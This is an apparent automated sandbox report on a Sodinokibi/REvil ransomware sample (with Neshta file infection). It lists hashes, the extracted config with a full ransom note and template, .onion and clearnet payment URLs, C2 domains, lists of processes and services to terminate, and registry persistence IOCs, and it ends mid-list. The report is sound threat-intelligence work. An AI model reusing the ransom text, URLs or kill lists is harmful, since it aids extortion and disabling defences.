General
Target
Filesize
Completed
Task
d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
207KB
24-01-2022 01:09
behavioral1
Score
10/10
MD5
SHA1
SHA256
SHA256
8af4a97a5a07807277a02eb69a859120
c9752d458c840ea4585efcdd16bbb5bf1a05ac44
d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424
c9e79390acf6245bb7936df92bf7bf560266c262199abb586a5d8f14d320a17a5a8ec3ff97efaeab11a12dc252f2fa2aaa185947faf40620b79a3bd3b4a8d393
Malware Config
Extracted
| Path | C:\7x8f6ued-readme.txt |
| Family | sodinokibi |
| Ransom Note |
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 7x8f6ued.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2377B5A9E37B39BA
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/2377B5A9E37B39BA
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
HMyfPLqTEdUZMnm99Rcb4VP9j1EEUjGOrzIPfgQTHcR5mDrzlWVe8oJNu6PbZ8c/
U1tF/sP9LLtW0Z3UVQm+q5NVOyKH08+if1mXlVDz3tynFXVfD31DVwgqzKB6ZGT2
1N4IiGvMNryyqaUOUNVUkwZooUJO4meHkwoaM8oqsjpzl9mqlVfnQUmBOu741JG6
S4sLlFWMu0xib6vX+ArV8+Z1B23i9EYa1QPElmEO4xy+YeNfA4H78HWwAj5at3bG
JEsfUVuCQHWg82yAmJQ1wIvIBsHLzHEiZksrNRxjm/OXO37c7ZqMj/dFsthRIckP
UWioIkhOEvN+CBbOlQX32AtznqVKFLNiYVXMOpLO7vPRV9XRpqncckcpi+N47RsL
U6/5kCZhFvdZjY2tTbFIib9HCveqjObfsU9f0ZvXSbIMXIKNzE1l8fcGtd7ZbeP+
rTuG0dT8J0yyws5cKLg0pQ2fy9uHFOOpcLHjvk9fzC8FGo3YNaQFJ96a1CkYq3z9
dpZHsIj6h+Hr5VlzU6jEmKcnBUJN/0uKHUtkCcbBtpiCPsTaPXTuyddU+uyTlg0S
Tiloyppn1/3ssqBw18QUD6yvV1kffwExvTm4DcjBWVF0vEQvtPjhgDQG4HcFXmsa
BG1h79cjCAaSIpvI9zIeZwq4nEh1RKu7hgBVCa8CUFxG2Io0ettXNs9L1w9OqNn6
SAM1ByANauvmUPahCNeNWaXtITLU65JA2hZjwDHjdb1B6UWZ5hIpCCTWjSsUmADr
ZiIgVgfGBhGcjYb1bZwqcDhV8xsuCpQ7RXxjMzFn7Zn7iagEd+RV2KIyko3Vkc1X
72BP3NM61DMEM+UXhXeOm/byDjn7V8TIZ37e7piJPBjY1gRaEC89Ae2c3QHmMalN
o8HdBQJ+dXqt1LWtPHtg7Y/Bs/1tCs/zZhJDz5SEAdFuJzVbxDySbPoXmZvkaQUI
8GgDqNC02xCDODZvjIzSZhzuyA+xn09zrDsKA8nTky8pI3PmTkYoBlTFhqGx34de
+Z0RVsOmj4uVaXOpA2jBo/+j3UsE23cana/MNgFQkJvQFFWdguHB4zUU1CMCeiH5
yJMQTaYjMCuZ2X4GSRW/ivXz5k4m2+42bF/vlO9HYPg5AfM5E/ZvNpNdo+Kg7mPL
6qMLHr6qjtVtTkEvGS0Fpx4QjkZPW3bO5R/bE2pvFlPzhFyJxwNvlHOOYaZybWl/
Pq+99TtfAOfVdFb7QlQJgsLtVExnbNH+DPo0EIO5Spa+QgR0Nqei9lykGZVJwQqp
fJ/DUFE6gXMGjYEJ2TaCUZtbFWCbFgw/BF/zYw==
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
|
| URLs |
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2377B5A9E37B39BA http://decryptor.cc/2377B5A9E37B39BA |
Extracted
| Family | sodinokibi |
| Botnet | $2a$10$EWjSpd.R6SAti4bgJBSw9er8oKv3V7/QblFqIXtPzaY2HzBNCquva |
| Campaign | 3178 |
| C2 |
tinyagency.com oldschoolfun.net anthonystreetrimming.com botanicinnovations.com thefixhut.com polymedia.dk reddysbakery.com kindersitze-vergleich.de theapifactory.com partnertaxi.sk deschl.net gw2guilds.org smartypractice.com restaurantesszimmer.de vitavia.lt advizewealth.com edelman.jp fibrofolliculoma.info zweerscreatives.nl almosthomedogrescue.dog charlesreger.com manijaipur.com blog.solutionsarchitect.guru the-virtualizer.com fairfriends18.de tennisclubetten.nl body-armour.online aarvorg.com rumahminangberdaya.com sw1m.ru macabaneaupaysflechois.com themadbotter.com maasreusel.nl jadwalbolanet.info advokathuset.dk walter-lemm.de securityfmm.com smhydro.com.pl citymax-cr.com solinegraphic.com abogadoengijon.es jiloc.com ziegler-praezisionsteile.de argenblogs.com.ar aprepol.com petnest.ir wasmachtmeinfonds.at answerstest.ru imperfectstore.com nakupunafoundation.org |
| Attributes |
net true
pid $2a$10$EWjSpd.R6SAti4bgJBSw9er8oKv3V7/QblFqIXtPzaY2HzBNCquva
prc winword excel visio oracle isqlplussvc firefox dbeng50 mspub xfssvccon encsvc dbsnmp thebat mydesktopservice sql steam wordpad infopath agntsvc synctime outlook ocautoupds onenote sqbcoreservice ocomm tbirdconfig thunderbird msaccess powerpnt ocssd mydesktopqos
ransom_oneliner All of your files are encrypted!
Find {EXT}-readme.txt and follow instuctions
ransom_template ---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/{UID}
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
{KEY}
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
sub 3178
svc memtas mepocs backup sophos sql svc$ vss veeam |
Signatures 18
Filter: none
Collection
Credential Access
Defense Evasion
Discovery
Impact
Persistence
-
Modifies system executable filetype associationd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Neshta
Description
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
Tags
-
Sodin,Sodinokibi,REvil
Description
Ransomware with advanced anti-analysis and privilege escalation functionality.
Tags
-
Executes dropped EXEd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
pid process 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Modifies extensions of user filesd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Description
Ransomware generally changes the extension on encrypted files.
Tags
Reported IOCs
description ioc process File opened for modification \??\c:\users\admin\pictures\CompleteRestart.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\users\admin\pictures\PushRemove.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\users\admin\pictures\StopSet.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\users\admin\pictures\WatchSet.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\JoinDeny.crw => \??\c:\users\admin\pictures\JoinDeny.crw.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\users\admin\pictures\ResolveExit.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\MeasureStep.raw => \??\c:\users\admin\pictures\MeasureStep.raw.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\ResolveExit.tiff => \??\c:\users\admin\pictures\ResolveExit.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\users\admin\pictures\UnlockCheckpoint.tiff d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\BackupResolve.png => \??\c:\users\admin\pictures\BackupResolve.png.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\InstallConvertTo.raw => \??\c:\users\admin\pictures\InstallConvertTo.raw.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\CompleteRestart.tiff => \??\c:\users\admin\pictures\CompleteRestart.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\StopSet.tiff => \??\c:\users\admin\pictures\StopSet.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\PushRemove.tiff => \??\c:\users\admin\pictures\PushRemove.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => \??\c:\users\admin\pictures\UnlockCheckpoint.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File renamed C:\Users\Admin\Pictures\WatchSet.tiff => \??\c:\users\admin\pictures\WatchSet.tiff.7x8f6ued d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Loads dropped DLLd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
pid process 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Reads user/profile data of web browsers
Description
Infostealers often target stored browser data, which can include saved credentials etc.
Tags
TTPs
-
Adds Run key to start applicationd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\k51299BQXH = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe" d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Enumerates connected drivesd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Description
Attempts to read the root path of hard drives other than the default C: drive.
TTPs
Reported IOCs
description ioc process File opened (read-only) \??\G: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\I: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\K: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\M: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\N: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\Q: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\U: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\E: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\S: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\T: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\V: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\W: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\X: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\P: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\B: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\J: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\L: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\O: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\Y: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\D: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\A: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\H: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\R: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\Z: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened (read-only) \??\F: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Drops file in System32 directoryd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Sets desktop wallpaper using registryd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\93hmz.bmp" d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Drops file in Program Files directoryd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exed62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description ioc process File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\ConnectMove.ppsm d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\ink\mip.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DWTRIG20.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\ConvertToMerge.ram d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\PushStart.mp4 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\FindImport.AAC d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\PushUse.jfif d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\ResumeSend.crw d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\OIS.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSOHTMED.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\ApproveRead.vssm d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\RevokeSet.m3u d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\OpenInstall.xla d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmplayer.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File created \??\c:\program files\7x8f6ued-readme.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\TestLimit.pptx d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\UnblockBlock.vstm d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\7x8f6ued-readme.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\WINDOW~1\WinMail.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\StopCheckpoint.pcx d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\RepairEdit.xlsb d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\WINDOW~1\wabmig.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\7x8f6ued-readme.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\LockProtect.mp3 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\EnterRedo.M2V d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\RestoreInstall.fon d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification \??\c:\program files\UndoSync.mht d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File created \??\c:\program files (x86)\7x8f6ued-readme.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\7x8f6ued-readme.txt d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe File opened for modification C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Drops file in Windows directoryd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description ioc process File opened for modification C:\Windows\svchost.com d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Enumerates physical storage devices
Description
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
TTPs
-
Modifies registry classd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe -
Suspicious behavior: EnumeratesProcessesd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exepowershell.exe
Reported IOCs
pid process 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe 1520 powershell.exe -
Suspicious use of AdjustPrivilegeTokend62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exepowershell.exevssvc.exe
Reported IOCs
description pid process Token: SeDebugPrivilege 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeBackupPrivilege 1632 vssvc.exe Token: SeRestorePrivilege 1632 vssvc.exe Token: SeAuditPrivilege 1632 vssvc.exe -
Suspicious use of WriteProcessMemoryd62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exed62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
